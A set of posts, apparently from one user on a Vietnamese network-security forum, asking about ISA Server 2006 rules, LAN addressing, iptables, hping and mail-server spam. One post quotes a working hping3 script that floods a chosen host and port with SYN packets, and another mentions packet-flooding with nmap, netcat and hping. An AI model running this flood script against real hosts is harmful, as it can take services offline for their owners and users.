|
|
làm sao để up sơ đồ mạng lên nhì. Tìm mẫi không thây tiện ich nay đâu cả. Ai biết chỉ e với
|
|
|
anh KYO &A.T ƠI cho em hỏi thêm về vấn đề khác được không? tai vì e đang cần gấp!
E xin được trình bày thế này:
Cty e gồm 1 server,...và một máy chạy ISA 2006. Trên máy ISA e tạo một rule cấm một số trang web=> nhưng khi test thấy những máy đã join vào domain thì đều ok hết , nhưng đỗi với những máy vào mạng bằng wireless thì những rules đã tạo không có hiệu lực (cái wireless e đã disable dhcp rồi)?
Mong các bác cho e ý kiến. Nếu là lỗi cấu hình thì phải làm như thế nào. các bác pro hướng dẫn chi tiết giúp e nhe!
|
|
|
E xin được trình bày thế này:
Cty e gồm 1 server,...và một máy chạy ISA 2006. Trên máy ISA e tạo một rule cấm một số trang web=> nhưng khi test thấy những máy đã join vào domain thì đều ok hết , nhưng đỗi với những máy vào mạng bằng wireless thì những rules đã tạo không có hiệu lực (cái wireless e đã disable dhcp rồi)?
Mong các bác cho e ý kiến. Nếu là lỗi cấu hình thì phải làm như thế nào. các bác pro hướng dẫn chi tiết giúp e nhe!
E mới vào cty nên không biết mấy ông trước cấu hình như thế nào nữa.
Thanks! moi người trước nhe!
|
|
|
thanks! a nhiều. chăc e con phải học hỏi nhiều!
vì e cũng mới được nhận vào làm cho cty.chăc e còn nhiều việc phải làm!
thôi e bắt tay vào việc đã hjj. cảm ơn mọi người nhiều nhiều
|
|
|
e xin được trình bày thế này:
Công ty mình tất cả các máy tính từ pc sever đến pc client cho tới các Router và Switch đều xài chung một giải địa chỉ IP la 192.168.16.0/24.(không được chuyên nghiệp cho lắm!).
Câu hỏi e là thế này : không biết nếu xài chung một giải địa chỉ IP như vậy thì về lâu dài có xảy ra hiện tượng xung đột trong mạng LAN không nhỉ?
Mong các pro chỉ giáo #:S cho
|
|
|
mình nghĩ về cơ bản họ chỉ kiểm soát các phiên kết nôi thôi. Vì thế họ chỉ việc đóng phiên kết nối thôi. Còn từ liên kết vật lý họ có thể làm tất cả nhưng trải qua nhiều công đoạn đấy bạn !
|
|
|
mình xin được góp ý thế này :
trước đấy mình cũng có xài qua soft VMWARE. Khi sử dụng máy ảo mình có thể cài vài máy ảo chạy bằng các hệ điều hành khác nhau ( hack thì hay xài LINUX or UBU...) trong máy ảo mình có thể cấu hình cho máy ảo ra internet. Từ đó có thể sử dụng một số tools như : nmap,net cat,hping... để send gói tin với một số lượng lơn . Or các vấn đề liên quan.
|
|
|
để máy C có thể truy cập vào máy A bằng một ứng dụng nào đó chẳng hạn như web,ftp ... thì bạn phải mở port đó trên firewall.
ví dụ : ở đây tôi mở port 80
iptables –A INPUT –s 0/0 –p tcp --port 80 –j ACCEPT
|
|
|
vâng rất cảm ơn những lời khuyên của anh
|
|
|
rất cảm ơn anh! em biết là dạng tấn công food này rất dễ chống.em cũng đã đọc qua bài ký sự về DDoS trên diễn đàn, rất là hay nên em chỉ muốn tìm hiểu chút đỉnh thôi.Mong anh viết thật nhiều bài nữa để những sinh viên như em có cơ hội học hỏi thêm.
ngày nay các cuộc tấn công DDoS có những điểm gì đặc biệt so với trước kia không anh?
|
|
|
'mọi người trong diễn đàn ai rành về hping giúp đỡ em với
|
|
|
anh có thể giải thích cho em các biến trong đoạn chương trình dưới đây không và phải làm như thế nào? ! em biết việc này có lẽ rất kị đối với những người có kinh ngiệm như anh "conmale" nhưng đối với em nó rất quan trọng.Kính mong anh giúp đỡ! chân thành cảm ơn anh!
# (c) GPL2 fluxist(at)gmail.com
# Usage; hping3 exec ./synflood.htcl <hostname> <dstport>
if {$argc < 2} {
puts "Required arguments: hostname dstport"
exit 1
}
foreach {hostname port} $argv break
set srcport 14000
set target [hping resolve $hostname]
set myaddr [hping outifa $target]
puts "Synflooding $target..."
while {1} {
hping send "ip(saddr=$myaddr,daddr=$target)+tcp(sport=$srcport,dport=$port,flags=s)"
}
|
|
|
mình nghĩ bạn nên dùng một số chương trình Scan port tốt để kiểm tra.bạn có thể dùng nmap hay hping chẳng hạn qua đó bạn có thể biết được các thông tin khác .Cũng có thể cổng bạn kiểm tra đã được lọc chẵng hạn.Nhưng cái chính là bạn phải hiểu cấu trúc mạng để kiểm tra đạt hiệu quả.
|
|
|
[b][b]ý em la thế này : em muốn dùng hping để tạo ra các packet với các tuỳ chọn theo ý mình như : khởi tạo các cờ ( flag ) hay chèn một nội dung tuỳ ý vào các gói tin ? Không biết hping có thể tạo ra được một số lượng lớn các packet trong một khoảng thời gian không nhỉ ?
mong mọi người chỉ bảo ! e xin chân thành cảm ơn ![/b][/b]
|
|
|
ua.wen mat server minh chạy bằng linux.con chính sách thì sorry m không thể nói được.thi anh hảy hướng dẫn em đi.anh triển khai chống như thế nào thì cứ hướng dãn vậy.thành thựa xinh lỗi
|
|
|
không dễ dàng như vậy đâu.theo minh nghĩ thi vấn đề này nếu biết user,pass thi chưa đủ phải biết tên domain của you ser thui.lấy được nhưng gì share thui.còn một pc thường kết vào internet thi làm sao mà vào được ạ các bồ.người ta no share. hjx hjx
|
|
|
xin chào mọi người.
hiện mình đang tim hiểu cách chống spam reply trên mail server,nhưng nhiều ngày rồi mà vẫn chưa vào đâu.
ai biết thì chỉ dùm với.cho mình xin doạn code bằng linux(iptables).
thanks mọi người trước nhe!
|
|